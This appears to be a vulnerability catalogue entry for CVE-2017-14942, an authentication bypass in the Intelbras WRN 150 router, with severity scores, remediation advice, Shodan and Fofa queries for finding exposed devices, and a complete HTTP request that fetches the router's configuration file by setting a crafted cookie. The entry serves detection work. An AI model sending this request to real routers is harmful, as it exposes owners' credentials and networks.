🔙 목록으로 돌아가기

CVE-2017-14942: Intelbras WRN 150 - Authentication Bypass

TitleIntelbras WRN 150 - Authentication Bypass
Authorritikchaddha
SeverityCritical
ImpactAttackers can bypass authentication and download the router configuration file containing credentials, network settings, and sensitive information, potentially leading to complete network compromise.
RemediationUpdate the router firmware to the latest version.
CVSS Score9.8
EPSS Score0.01009
CVE IDCVE-2017-14942
CWE IDCWE-552
Shodan Queryhtml:"WRN150"
Fofa Querytitle="WRN150"
Tags cve cve2017 intelbras auth-bypass router vuln

🔍 Vulnerability Description

Intelbras WRN 150 router is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication and download the router configuration file by manipulating the admin:language cookie.

🌐 HTTP Request

GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Cookie: admin:language=pt
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-14942.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-14942.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A